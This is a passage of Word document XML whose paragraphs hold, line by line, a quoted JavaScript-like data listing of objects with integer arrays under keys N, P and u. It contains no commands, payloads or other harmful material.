    <w:p w14:paraId="0598916A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490F4B60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB80BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16847D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5814F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E7BA1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 14, 18, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F9B7B6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E09B45C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4558EED6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF512B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [35, 115]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F69DF1F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA195E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFCEF9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B4186D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819CBB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A8F536" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD3E843" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688255C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B210AC1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6840C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2824BCF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24722C45" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19130E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFCDE93" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF362C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20462D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733111CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C84BD10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B55F5B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBF49D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34807BF9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4020C225" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C4D23E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C27554" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C0B6D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 12, 159, 239, 264, 292, 332]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF54CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75950E37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F5AB3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695775A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 4, 6, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B491514" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA8DD0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DF2D78" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E02451" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE1B74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D01DCA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F139066" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C974D80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53852D65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B6C4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6ECC4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1115DB6B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8F64E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1E9AE8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67297778" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD9117B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80822F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530F317F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAA8AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56095B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B1C259" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679A574" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD13CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D9650" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [122, 275]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC31D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6710B01D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06412C91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D577CF6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061AB60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8830D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C86941" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307AD33B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73065892" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580C695" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484F318C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212CA586" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6BB1A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D4C1D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D3670" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE3EBA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21794FD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 6, 7, 8, 9, 10, 17, 20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F7F47E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B715F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E91D0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C903B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170601BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7CEB53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5CB62E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5D32F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A438F0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD41C3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C8903" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330EFC3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776AE41A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABDB899" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FA8DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDDF39C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D792E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 16, 23, 35, 40, 62, 149, 218, 238, 322, 333, 353]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B3242" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933EA5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B2CA33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103ED42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1B1A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F921BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D905A33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E15130" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF45F40" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6F8A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE4023" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF6957" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8F449" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2091E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8913DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC0F26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E2D66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D080FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF14913" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6, 7, 10, 11, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8D053D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 8, 9, 12, 15, 21, 22, 23, 28, 159, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490EDCDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3BCCBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A99A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54553C1C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFF0F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FBF1B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53741BD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285C1F2F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71250405" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34182BA1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E840D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452CA1EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C7AE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
